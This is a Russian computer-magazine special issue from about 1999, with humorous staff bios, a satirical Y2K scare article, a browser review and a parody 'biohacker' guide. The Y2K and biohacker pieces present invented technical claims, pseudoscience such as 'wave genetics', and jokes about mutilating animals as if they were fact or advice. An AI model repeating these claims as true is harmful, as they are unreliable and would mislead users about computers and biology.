Кино: Хех, после радиолюбительских экспериментов над своим телевизором он показывает только информационно-аналитические программы, из которых я беру умные слова для своих статей, за что постоянно получаю от главреда по башке со словами «СайдЫгз, что ты перед народом выпендриваешься??? Будь проще!». А кино смотрю исключительно в кинотеатрах с долбаным звуком, и исключительно приобретая билеты на последнем ряду и жевательную резинку Стиморол Про Зэ (не путать с Прозаком!) ;).

Компьютер: используется для выработки мужественности путем игры в тетрис на девятой скорости. И составления в любимом редакторе Note Pad кроссвордов, чтобы поучаствовать в народной игре «Поле чудес» :).

Софт:

Ось: W98/2000/NT4 (Рай Мастдая:)), Браузер: NN 4.7, Мылер: The Bat 1.35, IRC клиент: Pirch, Качалка: ReGet 1.5, Звонилка: SP Dialer, Антивирь: АВП, Шелл: FAR 1.62, Файрвол: Signal9, Шифруюсь: ПЖП, Safe House.

Отдых: как и у всех - порносервер, замороженная пицца и пепси-кола лайт в смеси с 3-ей Балтикой. Рады? Да-да, рады! Рады те придурки, что пишут такой бредняк о нашем брате компутерщике. Под насыпью компьютерного бытия скрывается вполне нормальное существо с человеческими привычками. С любовью к девушкам, спорту и активному отдыху. А Инет так и остается неким шампунем 2 в 1, т.е. и отдыхаешь, и работаешь. И от перхоти нефиганеделания помогает, и одновременно позволяет полноценно прогрузить трафик мозговой деятельности.

Всего «Х»орошего&Happy hacking 4U!

Даниил Шеповалов aka Dan Dare

После прочтения моей первой заметки о себе главред разослал всем мессадж, в котором категорически запретил писать в этом разделе откровенную паранойю, так что я, пожалуй, умолчу о том, что я - интергалактический мета-экзистенциальный портал, Трижды Вишну Внешних Пределов и все такое.


Спецвыпуск хакер, номер #001, стр. 001-004-11, КОМАНДА

КОМАНДА

Спецвыпуск хакер, номер #001, стр. 001-004-11

Итак, я - Дважды Будда... бррр... в смысле учусь в Ленинградском Электротехническом Институте на факультете Компьютерных Технологий и Информатики (3-ий курс). После окончания планирую работать либо мойщиком витрин, либо просто бомжом. Сейчас же я ведущий программист, главный рисователь трехмерных баночек и какой-то там директор в конторе нескольких своих однокурсников. Официально мы занимаемся онанизмом по фонарикам и еще чем-то вроде этого...

Несколько лет назад я отобрал у сестры книгу «Энциклопедия для девушек» и вырвал оттуда все страницы начиная с «Разнообразие орального секса» до «Извращенец ли ваш партнер?». С тех пор перечитываю эти страницы каждый вечер. Все, кто со мной общается больше месяца, уже давно поставили диагноз: «сексуально-озабоченный, психически-неуравновешенный самовлюбленный кретин».

Еще я периодически занимаюсь: плаваньем, интеллектуальным онанизмом, покером, кричанием «ос!» и «кийя!», психоделической разведкой, рыбалкой, фигней, копирайтерством, писательством, рыданьем в подушку, экстремальным туризмом, экстремальным русским языком и толканием чужих видеоплат.

Ненавижу: бюрократию; когда люди «не врубаются»; вставать в 7 утра; WinAPI.

Люблю: Надю Шелковую; всех на свете; йогурт; Лешу Свиридова; спать; OpenGL.

Музыка: Обожаю кельтские баллады. А так, вообще, по-разному бывает. Сейчас, например, я слушаю Aqua «Roses are red» и просто балдею от ощущения бесконечного космического равновесия.

Кино: Форрест Гамп, Враг Государства, Чук и Гек...

Лит-ра: Туве Янссон, Лобсанг Рампа, Сумерки Богов, Боян Ширянов...

Мечта: Издавать журнал «Колбаса» и еженедельное приложение «Психоделическая разведка».

Компьютер: На компе я занимаюсь программированием (трехмерная графика), рисованием всяческой пурги в 3D MAX’е и писательством другой пурги в Ворде.

Софт: Windows98, IE4, The Bat!, mIRC, Go!Zilla, VMT Dialer, 3D MAX, Visual C++.

Игрушки: MDK, Space Quest 6

Отдых: Иногда капитально оттягиваюсь на вечеринках до полного просветления сознания, но это бывает крайне редко. Обычно же я, как полный ботан, беру книгу какого-нибудь Пелевина или Стругацких или вообще Агни Йогу и тихонечко засыпаю в уголке. А летом развлекаюсь всенародным хождением на байдарках по карельским озерам.

M.J.Ash

Для начала немного информации: большая буковка «M» в моем нике означает «Майкл», а загадочное слово «Ash» на русский не переводится и произносится не иначе, как «Эш». Никакого Аш и Аж, за исключением словосочетания «Великий Аж» - с ним я готов мириться :). Букву J я добавил совершенно «от балды» ((с) 2poisonS :), для пущей солидности.

Итак, меня зовут Michael J.Ash и я пишу для Х. Но, разумеется, так было не всегда... До того, как Х обрел в моем лице знатного WWW-шника и Шаровароведа, я уже успел окончить школу, освоить в техникуме ценную для народного хозяйства специальность наладчика станков с ЧПУ и робототехнических комплексов, а также пройти настоящую школу жизни - питерский Политех.


Спецвыпуск хакер, номер #001, стр. 001-004-12, КОМАНДА

КОМАНДА

Спецвыпуск хакер, номер #001, стр. 001-004-12

И вот теперь я каждый день «по долгу службы» вынужден разгребать залежи софта и изучать веб-сайты с претензией на оригинальность, а также каждый месяц знакомить тебя с результатами своих изысканий. Но самое странное, что я все еще испытываю удовольствие от этой работы. Как это у меня получается - ума не приложу! :)

Ненавижу: Кроме глупости своей и чужой, я, с недавних пор, люто ненавижу ежиков! :)

Люблю: Люблю посидеть со старыми друзьями в Money-Honey, выпить кружку пива, вспомнить былые подвиги.

Музыка: Быстрая, танцевальная, хотя мне все очень быстро надоедает, за исключением, пожалуй, «Be-Bop-A-Lula» Джина Винсента - эту песню я могу слушать часами. :)

Кино: «Скала», «Последний бойскаут», «Смертельное оружие»...

Компьютер: Мой старенький 200 пень без MMX c 48 метрами мозгов ждет не дождется лета, когда я отправлю его на заслуженный отдых. Мой верный товарищ, именно с его помощью я разучился писать и считать. :)

Софт: Одна тестовая, одна рабочая Widows 98. Обе жутко загажены левыми прогами. В общей массе неизменно виднеется броузер Opera, качалка GetRight, почтовик The Bat, клон Norton-а - Windows Commander... До кучи ICQ, AtGuard, Word, персональная поисковая система Ищейка, пара-тройка антивирусов... А еще у меня установлен Linux - чисто для экспериментов.

Отдых: Если как всегда, то сетевой десматч в Кваку на пару часов или протирание подошв в клубе под Rattlesnakes. А если экстремально, то лучше, чем пузом кверху на морском берегу, для меня еще ничего не придумали! :)


Спецвыпуск хакер, номер #001, стр. 001-014-1, Y2K: must die или нет?

Y2K: must die или нет?

Шикель Грубый

Спецвыпуск хакер, номер #001, стр. 001-014-1

Интересные слушки стали распространяться по нашей редакции, друзья мои. Явился тут к нам один с придурковатой физиономией и заявил, что скоро должен наступить 2000 год! Да к тому же не просто наступить, а ознаменовать свой приход салютом их атомных ракет, массовым психозом компьютеров и полным помешательством их пользователей. Ну, и придумают же! Ну, нас-то так просто на такие понты не возьмешь, мы-то знаем, что депутаты никогда не примут закон о наступлении 2000 года. А компьютеры... ну да, верно, компьютеры ничего о наступлении 2000 года не знают. Но их тоже можно понять, ведь они же неграмотные, Билл Гей-тссс скрывает это от них в глубочайшем секрете, в школе им про это не рассказывали, в институте и подавно, там только студенты их пивом поливают, да всякие шибко умные программеры на них вирусы тестируют. Когда же тут о Y2K думать, в такой нервной обстановке?

Y2K: MUST DIE ИЛИ НЕТ?

Итак, в чем же заключается суть проблемы Y2K — именно так, с содроганием, переходящим в ужас, называют знаменательную дату в мировой электронно-вычислительной прессе? Трагедия состоит в том, что львиная доля мирового парка ЭВМ создавалась еще в те времена, когда даже такой оптимист, как Папа Римский, не верил и не предполагал, что это абсурдное сборище дешевых тайваньских деталей под названием PC сможет дожить хотя бы до окончания гарантийного срока. Про Y2K же даже и речи не шло. Но мир подвело умение бедного и жадного пользователя выжимать из компьютера все ресурсы, а именно: разгонять i286-16 до состояния iPII-666 путем замыкания двух конденсаторов в спертой из палеонтологического музея мультикарте. Эти компьютеры работают себе, doom-ают, играют с вами в шахматы, отсылают ваш e-mail к черту на кулички и даже не задумываются о том, что остался всего год до того момента, как счетчик лет в их таймере с грохотом перевалит с 99 на... А вот то, на что он перещелкнется, и знаменует весь страх и ужас современного кибернетического сообщества.

Опасность намбер раз

Подавляющее большинство современных программных продуктов (см. мануалы) не рассчитаны на распознавание первых двух цифр текущего года. Год рождения В.И.Ленина (1870) и выход последнего альбома The Beatles (1970) для них одно и то же, вне зависимости от того, чьи песни (Ленина или Леннона) им нравятся больше. Наглядный пример — Windows 95, даже в названии которого фирма Microsoft не предусмотрела дополнительных цифр. Когда Билли, анонсируя Windows 98, уверял, что эта операционная система уже подготовлена к проблеме Y2K, эксперты только рассмеялись — еще бы, ведь система стала зваться именно Windows 98, а не Windows 1998, а, значит, счетчик первых двух цифр года в нее так и не был включен.

Теперь наступил момент для мысленного опыта: представьте, что на коммерческом порнографическом сайте, который вы, вместе с вашими родителями, разместили в Интернете, происходит автоматическое обновление информации на более свежую. Для автоматизированной системы это норма, когда сервер заменяет устаревшие картинки, послания и данные на новые, потихоньку уничтожая старые. Как только наступает год «00», сервер, сравнивая файлы с этой датой, естественно, решит, что данные за «97», «98» и «99» новее — еще бы, ведь эти цифры намного больше. В результате все, поступающее в 2000-ом году, будет автоматически уничтожаться, и даже пожухлые черно-белые порнокартинки 1932 года, отснятые допотопной «Сменой 8М», будут выдаваться за эксклюзивную свежатинку. Количество клиентов платного сайта катастрофически падает, разочарованная публика требует вернуть обратно деньги за билеты, и через полгода вы и ваши родители оказываетесь по уши в долгах, и, как результат — остаток вашей жизни вы проводите в долговой тюрьме.


Спецвыпуск хакер, номер #001, стр. 001-014-2, Y2K: must die или нет?

Y2K: must die или нет?

Шикель Грубый

Спецвыпуск хакер, номер #001, стр. 001-014-2

По этой же причине редакция Х рекомендует уничтожить все ваши игры с автоматическим сохранением и загрузкой незадолго до нового 2000 года. Ибо по прошествии этой планки игра не сможет правильно определить, какой сохраненный файл более старый, а какой - новее, и в результате вы будете обречены при каждом запуске играть снова в том месте, где остановились в прошлом году... Если вообще ваш компьютер еще будет в состоянии играть, но об этом в опасности намбер два.

Опасность намбер два

Любой, даже упавший с Луны без парашюта человек, знакомый с теорией компьютерных игр, прекрасно знает, что в основе их функционирования лежат так называемые «датчики случайных чисел». Беготня монстров, перетасовка колоды карт, направление атаки Протоссов или количество хитов, выбиваемых из вашего кровного врага в ролевой игре - все эти события находятся в прямой зависимости от набора случайных чисел, дабы они были как можно более непредсказуемыми, а, значит, возбуждающими. Весь смех и хохот заключается в том, что подавляющее число генераторов случайных чисел основано на подсчете цифр, исходя из показаний компьютерного таймера. Функции перемножения часов, секунд и лет присутствуют практически везде... Но когда номер года становится «00», то и любые операции с умножением окажутся нулевыми. А, значит, все ваши игрушки во всех ситуациях начнут выдавать действия, обусловленные числом «0». Чем это грозит? Ваши монстры в Quake будут стоять на месте! AI в любой, даже самой совершенной RTS не сможет сдвинуть свои войска или произвести какой-либо внезапный выстрел. «Марьяж» и «Пасьянс» будет раздавать вам одну и ту же карту. А случайный демонстратор разных «баннеров» в Интернете автоматически зациклится и начнет показывать одну и ту же заставку; и молите Бога, чтобы это был баннер вашего сайта, а не тысяч конкурентов.

Опасность намбер три

Вам немедленно следует избавиться от всех демо, shareware и прочих рекламных и бесплатных программных продуктов. Подавляющее большинство из них ориентировано на то, что, спустя какое-то время (например, после года работы), они самоликвидируются, настойчиво требуя купить официальную и полную версию продукта. Что произойдет с такими программами на рубеже тысячелетий — и подумать страшно. Неожиданно программы обнаружат, что на календаре установлено время, даже меньшее, чем то, когда они были написаны. Как будто кто-то приклеил «Моментом» к отрывному календарю несуществующие виртуальные листки. Для любой мало-мальски умной программы это означает лишь одно: «пользователь — жулик, и методом подделки времени пытается меня одурачить, гад такой!». А защита от таких посягательств встроена повсеместно - «возмущенная» вашим обманом программа может самоликвидироваться, попутно, например, отформатировав винчестер из чувства праведной мести.


Спецвыпуск хакер, номер #001, стр. 001-014-3, Y2K: must die или нет?

Y2K: must die или нет?

Шикель Грубый

Спецвыпуск хакер, номер #001, стр. 001-014-3

Опасность намбер четыре

Что мы все о программах, да о программах? Чувствительно ли железо к испытанию временем? Да. Хотя большинство современных BIOS оперирует четырехциферным кодом года, это ничуть не означает, что периферия (видеокарты, винчестеры и мыши) или даже ядро (процессор, материнская плата, кулер и т.п.) считывают дополнительные разряды с сигналов точного времени, регулярно передаваемых им из BIOS. Логика «железа» — это логика, сравнимая с военной. После 23:59 31.12.99 должно быть 0:00 01.01.100. Но вместо этого шина данных подает сигнал о наступлении 0:00 01.01.00. Реакция железа может быть самой непредсказуемой. Оперативная память воспримет это как ошибку и скажет процессору, что он придурок. А процессор ответит, что все-таки должно быть 00, но память (в которой стоит проверка ошибок) опять потребует от процессора правильного результата (100), и это может затянуться вплоть до следующего тысячелетия. В лучшем случае ваш компьютер просто повиснет (придется нажать Ctrl+Alt+Reset или открыть CD-ROM драйвер и сказать туда фамилию). Но не факт, что это разрешит конфликт с зациклившейся проверкой ошибки. Не справившаяся с зацикленной самопроверкой система обречена на выкидывание из окна. Эффект такого «Кольца Мебиуса» при входе в 2000 год — один из самых фатальных.

В другом случае ЭВМ может войти в режим «sleep», ибо слишком сильный разрыв во времени может заставить сработать системы, настроенные, например, на «сон после часа бездеятельности». А тут ведь речь даже не о часе, а о какой-то непонятной вечности. Такой «сон» действительно может оказаться вечным. Так что отключение всех функций «Power mangement» в вашем BIOS-setup и в параметрах системы категорически рекомендовано лучшими компьютероводами.

Но самую большую опасность для человечества таят военные компьютеры. Пентагон и Российское Министерства Обороны неоднократно получали просьбы от программистов-наблюдателей ООН пройти проверку на ошибку Y2K, но ООН было отказано с формулировкой «недопустимости вмешательства в хранилища стратегической информации». А ведь если компьютеры военных министерств войдут в описанный выше «спящий» режим, то вся система безопасности России или США окажется беспомощной перед лицом агрессии со стороны не компьютеризированных стран (Ирак, Монголия, Гватемала). А в случае глобального зависания всех военных систем центральные серверы автоматически среагируют на это, как на диверсию извне, и дадут команду об ответном ударе, наверняка очень даже ядерном.

Заключение

Автор этой статьи искренне надеется, что разум восторжествует, и человечество с честью выйдет из той опасной ситуации, которую создало само своей непредусмотрительностью. Редакция Х также ставит своей целью обезопасить своих читателей не только вышеизложенными инструкциями, но и действиями — на нашем сайте скоро можно будет скачать небольшой (140 Gb для PC и 360 Gb для Mac) файлик, превращающий ваш домашний компьютер в цитадель борьбы с двухтысячным годом!


Спецвыпуск хакер, номер #001, стр. 001-014-4, Y2K: must die или нет?

Y2K: must die или нет?

Шикель Грубый

Спецвыпуск хакер, номер #001, стр. 001-014-4

Как проверить

компьютер

на «проблему 2000».

В Интернете имеется огромное количество программ, выполняющих необходимое тестирование.

Приводим адреса сайтов:

www.nstl.com/html/nstl_y2k.html

www.unicore.com/millennium.html

www.firmware.com

Тестирование можно провести и вручную без использования специальных программ.

Проверка ОС

* Отключите компьютер от локальной сети (если он к ней подключен, конечно же).

* Загрузите ОС до монитора командной строки без использования драйверов и резидентных программ.

* При помощи команд date и time установите системную дату на 31 декабря 1999 года, а время на- 23:59 (пример: date31-12-1999 и time 23:59).

* Проверьте правильность установки даты и времени. Используйте те же команды без аргументов.

* Подождите 2 минуты.

* Проверьте системную дату. Если она поменялась на 1 января 2000 года, ваша ОС не имеет «ошибки 2000».

Проверка BIOS

* Войдите в BIOS Setup.

* Установите дату на 31 декабря 1999 года, время на 11:59PM.

* Подождите 2 минуты. Если на вашем ПК наступило 1 января 2000 года, ошибки века в вашей BIOS нет.

Проверка аппаратного таймера (RTC)

* Войдите в BIOS Setup.

* Установите дату на 31 декабря 1999 года и время на 11:59PM.

* Выйдете из программы Setup с сохра

нением установок.

* Выключите компьютер.

* Подождите 2 минуты, включите компьютер и, не дожидаясь загрузки ОС, войдите в Setup. Если дата изменилась на 1 января 2000 года, ошибки нет.

Программные продукты

Большинство разработчиков ПО уже подготовились к встрече 3-го тысячелетия и выпускают всевозможные средства коррекции, заплатки и т. д. Так, например, известная специалистам американская компания Microsoft, выпускающая достаточно известные программные продукты уже выложила на свой сайт «заплатки» для свободного доступа (www.microsoft.com /year2000).

Microsoft разделила все свои продукты на 5 категорий по степени готовности к проблеме 2000:

* Соответствует стандартам

* Соответствует с незначительными проблемами (что такое «незначительные проблемы» по мнению Microsoft — есть большая тайна, но надеемся, к «незначительным проблемам» не относится внезапное форматирование жесткого диска. И на том спасибо.)

* Не соответствует

* В процессе тестирования

* Не будет тестироваться

Мы приводим полный список продуктов Microsoft, не соответствующих стандартам и неготовым к проблеме 2000.

Access 2.0

FrontPage 1.1

FrontPage97

Internet explorer3.x for Mac

Office Professional 4.0

Site Server 2.0

Site Server express 2.0

Visual Basic 4.0, 3.0, 2.0, 1.0

Word for Dos 5.0

Works 3.0, 4.0, 4.5

Microsoft клянется, что все версии FAT и NFTS хранят дату в полном формате.


Спецвыпуск хакер, номер #001, стр. 001-017-1, Х-броузер. Альтернатива пришла!

Х-броузер. Альтернатива пришла!

Stranger

Спецвыпуск хакер, номер #001, стр. 001-017-1

Вся масса юзеров Internet делится на две части: первая и наиболее многочисленная — это группа людей, которые пользуются тем программным обеспечением, которое активно подсовывают им крупные производители, не обращая внимания на то, что предложенные проги — не обязательно самые хорошие и работают недостаточно стабильно. К таким продуктам относятся броузеры Microsoft Internet Explorer и Netscape Communicator. Но есть и вторая группа: это люди, которые обладают достаточно широким кругозором и выбирают то, что лучше, быстрее, удобней, стабильней и не обязательно произведено крутой, известной фирмой.

И раз уж ты держишь в руках наш журнал, то я надеюсь, что ты относишься именно ко второй группе юзеров. А поэтому я хотел бы рассказать тебе об одной из малоизвестных программулин, которая была выпущена очень известным производителем железок — фирмой Creative (помнишь великолепные подставки для кофе с пультом дистанционного управления?). Их прога называется Creative Inspire. Она не продвигалась на рынке программного обеспечения, а потому несмотря на то, что выпущена она довольно давно, остается неизвестной широким массам даже при наличии ряда достоинств, которыми она резво уделывает все «крутые» броузеры.

Creative Inspire оснащен великолепным графическим интерфейсом (в этом ты можешь убедиться, взглянув на рисунок), который является полной противоположностью оконным вариантам Internet Explorer и Netscape Communicator, и обладает всеми качествами и достоинствами этих броузеров, прибавляя ряд новых. Интерфейс отличается великолепной интеллектуальностью и интуитивностью. Работа с WWW облегчается целым рядом нововведений по сравнению с вышеназванными программами. Для упрощения работы с твоими любимыми страницами в программу встроена панель каналов, которая может включать в себя до ста маршрутов. Броузер поддерживает полноэкранный режим, минимизируя органы управления до размеров маленькой панели, на которой имеется строка URL. Да и к тому же, в отличие от всех этих крутых «Експлореров» и «Нафигаторов», Creative Inspire экономит место на твоем винте, занимая всего 3 Мега!!!

В броузер встроены проигрыватели Audio и Video файлов любого формата в режиме OnLine, управление ими вынесено прямо на главную панель программы, что чрезвычайно удобно. Они являются независимыми программами и, в отличие от Internet Explorer, не обращаются при проигрывании к каким-либо сайтам, что очень экономит время, а соответственно, и деньги.

Броузер поддерживает спецификацию HTML стандарта 3.2 и выше. Стандарт HTML 3.2 позволяет намного интересней оформлять страницы, главным образом за счет использования языка DinamicHTML. У Creative Inspire, в отличие от Netscape Communicator, отсутствуют проблемы с чтением сценариев, написанных на VBScript (Visual Basic Script), а также различными комбинациями кодировок Java и JavaScript (Netscape Communicator 4.0, в частности, не переносит маленькую русскую «я» с кодом 255 в JavaScript). Сам броузер превосходно работает с управляющими элементами ActiveX. Необходимо отметить и огромное количество распознаваемых и интерпретируемых кодировок и языков. К ним можно отнести и несколько кодировок кириллицы.


Спецвыпуск хакер, номер #001, стр. 001-017-2, Х-броузер. Альтернатива пришла!

Х-броузер. Альтернатива пришла!

Stranger

Спецвыпуск хакер, номер #001, стр. 001-017-2

Наибольшим достоинством, с точки зрения разумного (ленивого) юзера, будет потрясающая устойчивость в работе, его полная нерасположенность (можно сказать, вакцинированность) к критическим сбоям, чем, к сожалению, не может похвастаться Internet Explorer. А Netscape Communicator справляется с этой проблемой, но в силу того, что он игнорирует управляющие компоненты ActiveX и не понимает сценариев VBScript. А значит, большинство страниц рискуют так и не появиться на твоем мониторе.

Надеюсь, что мне удалось красочно описать тебе эту рулезную прогу и вселить в душу всепоглощающую страсть, буквально влекущую к установке и работе с Creative Inspire. Так что пусть твои шаловливые ручонки тянутся к мышке, пальчики набирают адрес поисковой системы, а мозг нетерпеливо стонет: «Хочу!». Поюзай эту прогу сам, и тогда ты получишь еще и физическое наслаждение. :)


Спецвыпуск хакер, номер #001, стр. 001-018-1, Практические советы начинающему биохакеру

Практические советы начинающему биохакеру

Гена Крэк-о-делов

Спецвыпуск хакер, номер #001, стр. 001-018-1

Кругом только и слышно: «Американские ученые открыли то-то, синтезировали это, вживили микросхему тому-то, глаза на лоб вылезли у того-то...» Но толком никто ничего сказать не может, только делают умное лицо и произносят загадочную фразу: «Ну, ты же понимаешь, эта информация сразу туда ушла», и показывают пальцем кверху. Ну да, так я и поверил! Очень нужна альпинистам эта информация! И так везде, представляете? Каждый тычет пальцем вверх и пытается меня убедить, что те, кто там, наверху, все засекретили. Короче, в один прекрасный день мне все это надоело, и я решил сам во всем разобраться. Поехал в ассоциацию альпинистов России и прямо спросил: «Почему вы всю информацию о компьютерных биотехнологиях засекречиваете?» Меня почему-то спустили с лестницы и сказали, что в следующий раз вызовут мне скорую. И тут я догадался. Ну, конечно же, скорая! «Био» и «медицина» ведь так близко! Странно, но в скорой мне тоже ничего не рассказали, а зачем-то погрузили меня на носилки и отвезли в психиатрическую лечебницу. Оказалось очень кстати. Именно там я и познакомился с некоторыми людьми (они тоже там отдыхали), которые мне столько порассказывали!

Что вы знаете о биокомпьютерах? Пока маловато, но скоро ими детей пугать будут. С тех пор, как открыли, что человек думает мозгом, всем понятно, что его надо изучать. Изучали его очень активно: и из тела вынимали, и электродами туда тыкали.... Но с развитием компьютерных технологий стало возможным взглянуть на проблему с другой стороны...

Для начала научись

правильно вскрывать

череп!

Вот сидели американские ученые и думали, что те гении, которые со мной в палате не лежат, дохнут как селедка в луже с нефтью. А ведь было бы здорово сделать так, чтобы их драгоценный мозг не умирал вмести с телом. Но какие-то уроды, типа нашего зав. Отделением, — такие исследования запретили. Ведь в мертвом человеке мозг портится очень быстро. Чтобы продлить его существование, необходимо «подключиться» к нему задолго до естественной смерти человека. Я с крысами и лягушками часто такое проделывал. Просто вскрываешь крыске череп и подсоединяешь туда электроды в нужных местах. Все это обрабатывается на компьютере, машина искусственно поддерживает жизнь своей жертвы. Обрати внимание: чтобы «подключиться», мозг вынимать не нужно. Аккуратно распили крышку черепа и быстро подсоединяйся электродами.

Используй нейросети!

Но неутомимые ученые не сдавались. Стали делать нейросети. Дело в том, что обыкновенный компьютер сделан до боли неправильно. Оптимальной считается троичная система счисления, а у компьютеров она — двоичная. Знаете про АВМы (Аналоговые Вычислительны Машины)? Серая тумбочка с блестящими клеймами решает дифференциальные уравнения так лихо, что любой Пентиум выпадет в осадок от зависти. Там все математические функции моделируются реальными физическими (аналоговыми) процессами. Но только для каждого нового диффура нужно новую схему собирать — это около 200 проводочков. И все вручную. Так что всем проще работать с убогим цифровым компьютером. Но и здесь спасение нашли, попытались построить алгоритмы, которые походят на обычную биологическую эволюцию. И получилось, что такие программы способны обучаться очень быстро и эффективно работать. А ежели ты туда пихнешь еще и нейроакселератор (карта такая специальная, поищи в магазинах или на рынках), то все в 1000 раз быстрее будет. Сейчас большинство крупных банков стремительно закупает такие биопрограммы и биокарты. Ведь подобная программа очень быстро у крутейших брокеров опыт перенимает и начинает зарабатывать очень большие деньги. Естественно, стоит это дорого и сильно не афишируется. Такая технология уже давно превзошла человеческие возможности в плане прогнозов, и ее можно научить чему угодно. Разрабатывалось это все, естественно, для NASA, а работает на оборонку и крупный бизнес — у них деньги есть. Это действительно сложная штуковина. Мы вот тут с Наполеоном пытались ее сами спаять — не получилось. Хотя, может, нам просто мозгов не хватило? Не наших, в смысле, а тех, которые мы в операционной свистнули. У них там после операций много зап. частей остается.


Спецвыпуск хакер, номер #001, стр. 001-018-2, Практические советы начинающему биохакеру

Практические советы начинающему биохакеру

Гена Крэк-о-делов

Спецвыпуск хакер, номер #001, стр. 001-018-2

Побалуйся с

имплантантами

(мои любимые опыты).

Тут и медики подоспели. Совершенство технологий позволяет сейчас достаточно органично интегрировать в живое тело электрические модули. Так вот, в Южной Калифорнии Теодор Бергер активно сращивает кремневые чипы и живую ткань. Результаты исследований уже позволяют частично восстанавливать части мозга после сильных повреждений. Вот попал какой-нибудь магнат в аварию — черепно-мозговая травма, море крови, ну, словом, зрительная кора пострадала. Идет он к ученым, они ему туды чип электронный вставляют, который может частично зрение восстановить. Очень дорогостоящая операция! Ты, кстати, если хорошенько дома потренируешься, то потом сможешь огромные бабки заколачивать таким образом. Я вот недавно собаку свою так прооперировал. Собаки же все видят в черно-белом изображении. Вот мне ее и стало жалко. Я ей череп вскрыл, пару чипов с видеокарточки выдрал, ей впаял и глаза вырезал, а на их место две телевизионные трубки 21-дюймовые вставил. Маме вот только не понравилось, ее с сердечным приступом увезли, когда она моего песика увидела. Но это все ерунда, я вот тут узнал, что в ближайшем будущем завершится работа над вспомогательными вживлениями. Можно будет усиливать математические функции мозга, память, вживить передающее устройство. Тоже, кстати, прибыльное дело! Новым русским мобильные в бошки вшивать, себе пару терабайтиков памяти, чтоб порнушные видеофильмы на касетах не покупать, а посмотреть один раз, а потом в мозгах крутить, когда в метро едешь, например.

А пока я с собачкой своей экспериментировал, Марк Стидман (крупнейший физиолог) с группой лингвистов в Пенсильвании начал учить компьютер понимать интонацию и грамматическую часть предложения. Так что скоро машина будет действительно ПОНИМАТЬ, что от нее хотят. Это еще один шаг к биологическим интерфейсам.

В Вильнере Институт Глаза разрабатывает системы восстановления зрения. Только посмотри на картинку! У первого мужика частично повреждена сетчатка - не беда! Биоэлектронный механизм распределяет на здоровые куски сетчатки видимое изображение. Второму мужику вовсе глаза не нужны. В зрительную кору мозга (это, как видишь, на затылке) внедрен массив электродов. А на ботанских очках стоимостью 10 000$ закреплены цифровые камеры. Третьего мужика ты не видишь, это его сетчатка, там такой зелененький имплантант, и опять цифровая камера на очках. Только тут информация поступает не в мозг, а на сетчатку. Все удобно и просто, только как такое реализовать смогли? Понятное дело — кроликов резали, заметьте, живых! Что от дохлых-то проку?


Спецвыпуск хакер, номер #001, стр. 001-018-3, Практические советы начинающему биохакеру

Практические советы начинающему биохакеру

Гена Крэк-о-делов

Спецвыпуск хакер, номер #001, стр. 001-018-3

Ну и Израиль, конечно, не отстал, там выяснили, что сигналы по нейронам идут по принципу радиоприемника. Ты, наверно, знаешь, что каждая часть мозга отвечает за свое. Зрительная кора - зрение, слуховая — слух и т.п. Есть и нервы специальные: зрительный, слуховой.... Но есть и другой способ связи глаза с мозгом, например. Оказывается, что каждый участок мозга имеет свою волну, ну прям как радиостанции. Это значит, что теперь, чтобы к зрительной коре подключиться, мне не надо туда или в сетчатку электроды совать. Теперь я могу подключиться к любому нерву, настроиться на волну нужного мне участка мозга и передавать или получать информацию. Это раскрывает невероятные возможности для техники. Представь обычные наушники, использующие этот принцип: они и зрительные галлюцинации у тебя вызовут, и холод, и голод, и запах, словом, полная реальность. И нечего особенного не надо, запустил программу, и все. От этих исследований, кстати, пострадали крысы. Поэтому они теперь плееров боятся очень.

Хирурги, конечно же, тоже рады были: «Если глаз можно заменить электронным, почему бы руки и ноги такими не сделать?». И стали они делать нейроуправляемые протезы. Процессор к нервам подключен, желание человека улавливает и механической частью управляет. Больше всего японцы преуспели: их биоэлектронная рука может с равной легкостью взять и кирпич, и хрупкое яйцо.

Ты уже заметил, наверное, что осталось тебе только все эти технологии доделать и вместе собрать. И получим мы человека, мозг которого соединен с компьютером, а компьютер — с Интернет. Для него компьютерный мир столь же реален, как и физический.

Все бы хорошо, да моралисты не пускают. У их брата хватка железная: «Животных не мучайте! Компьютер и так для здоровья вреден, а тут еще вдруг кто биоэлетронные мозги вирусом заразить вздумает! Нееее, мы того не хотим! Мы того не допустим». Дошло даже до того, что все хваленые американские, германские и др. ученые ежегодно перед зелеными отчитываются. Мол, не больно обезьянкам от наших исследований. Глядите: они сами в нашу машину залезают. Другое дело Россия, есть нечего, какое нам дело до каких-то обезьян? Тут и на людях можно поэкспериментировать....

Изучай генетику.

Пригодится!

Электроника это, конечно, хорошо и здорово, да только проблем не оберешься. Вот поставил ты соседу в мозг чип математический, а он взял и перегорел. Он опять к тебе припрется череп вскрывать, мозги потрошить, да еще и пол-литра с собой захватит, а тебе другими делами надо заниматься. А по пьяни можно и батарейки случайно ему не туда вшить. Вот генетики и думают, что круто было бы вывести зверушку такую, она тебе сама в мозг заползет, сама подключится, никаких батареек. И, знай, сидят себе в своих лабораториях и все ДНК читают, белки разворачивают, картинки дурацкие рисуют. Мол, все человеческие гены прочтем и тогда.... А что тогда?


Спецвыпуск хакер, номер #001, стр. 001-018-4, Практические советы начинающему биохакеру

Практические советы начинающему биохакеру

Гена Крэк-о-делов

Спецвыпуск хакер, номер #001, стр. 001-018-4

Но это все на западе, а у нас-то тут такое творится! Еще в далеком 1957 году китайский исследователь Дзян-Каньджен построил ряд интересных приборов. Так появились на свет животные и растения-химеры, такие, как куро-утки, цыплята с волосами самого Дзян-Каньдженя, кролики с рогами козы, кукуруза, из початков которой росли пшеничные колосья, и т.д. Его исследования были продолжены российскими учеными. А сегодня этим занимается Горяев в институте Квантовой генетики при РАН. Хороший мужик, кстати. Вот когда время найду на то, чтобы у муравьев хвосты от павлинов выращивать, к нему пойду подучиться. А сейчас я очень заинтересовался теорией «волновой генетики». Горяев и предшественники выяснили, что ДНК является своеобразным генератором особых полей. Таким образом, живые клетки способны общаться даже через кварцевое стекло. А электронные аппараты, способные своим излучением дистанционно влиять на гены человека и животных, уже построены. Более того, они окружают нас. По мнению Горяева все возрастающее количество генных мутаций связано с наводнением нашей жизни электроволнами. Наибольший вред приносят сотовые телефоны, микроволновые печи - наиболее мощные излучатели. Но самое интересное, что тебе будет очень просто создать аппарат, который, следуя программе, влиял бы на гены человека. Если нечто подобное смог создать китаец в 57-ом, то в наше-то электронное время! По сравнению с волновой генетикой современная — просто детские игрушки. Но все мы, конечно, думаем, что такого аппарата у спецслужб нет, и вообще такое невозможно....

Не шути

с нанотехнологиями!

